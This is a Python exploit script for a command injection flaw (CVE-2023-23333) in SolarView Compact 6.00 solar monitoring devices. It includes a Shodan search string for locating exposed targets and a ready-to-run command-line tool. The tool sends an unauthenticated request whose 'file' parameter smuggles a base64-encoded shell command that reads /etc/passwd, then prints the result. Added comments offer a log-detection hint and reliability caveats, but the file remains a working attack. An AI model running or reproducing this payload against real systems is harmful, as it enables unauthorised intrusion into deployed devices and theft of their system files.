- #- Exploit Title: SolarView Compact 6.00 - Command Injection
- #- Shodan Dork: http.html:"solarview compact"
- #- Exploit Author: ByteHunter
- #- Email: 0xByteHunter@proton.me
- #- Version: 6.00
- #- Tested on: 6.00
- #- CVE : CVE-2023-23333
- import argparse
- import requests
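def vuln_check(ip_address, port):
    """Probe a SolarView Compact device for CVE-2023-23333 and print the verdict.

    Sends a single GET, with no credentials, to ``/downloader.php``. The
    ``file`` query parameter carries shell metacharacters and a base64-encoded
    command that decodes to ``cat /etc/passwd``; the response body is then
    searched for the string ``root``.

    Detection: the same request shape is what a defender looks for in
    web-server or proxy logs -- a ``file=`` value on ``downloader.php`` that
    contains ``;``, ``|``, ``base64`` or an encoded NUL (``%00``).

    Args:
        ip_address: Host or IP of the device; interpolated into the URL as-is.
        port: TCP port of the device's HTTP service.

    Returns:
        None. The result is written to stdout.
    """
    url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
    try:
        # requests has no default timeout; without one an unresponsive host
        # blocks the script indefinitely.
        response = requests.get(url, timeout=10)
    except requests.RequestException:
        # Refused connection, DNS failure, timeout, etc.: report it the same
        # way as a non-200 answer instead of dying with a traceback.
        print("Error: Unable to fetch response.")
        return

    if response.status_code != 200:
        print("Error: Unable to fetch response.")
        return

    output = response.text
    # NOTE(review): a bare substring match on "root" is a weak indicator -- any
    # 200 page that happens to contain that word is reported as vulnerable.
    # Confirm a positive result manually before acting on it.
    if "root" in output:
        print("Vulnerability detected: Command Injection possible.")
        # The body is the device's account list; handle the output as
        # sensitive data when it ends up in a report or a ticket.
        print(f"passwd file content:\n{response.text}")
    else:
        print("No vulnerability detected.")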
def main():
    """Read ``--ip`` and ``--port`` from the command line and run one check.

    ``--ip`` is mandatory; ``--port`` is parsed as an integer and falls back
    to 80. Both values are handed to ``vuln_check`` unchanged.
    """
    cli = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
    cli.add_argument(
        "-i",
        "--ip",
        required=True,
        help="IP address of the target device",
    )
    cli.add_argument(
        "-p",
        "--port",
        type=int,
        default=80,
        help="Port of the the target device (default: 80)",
    )
    options = cli.parse_args()
    vuln_check(options.ip, options.port)
# Run the command-line entry point only when the file is executed as a script;
# importing the module performs no network activity.
if __name__ == "__main__":
    main()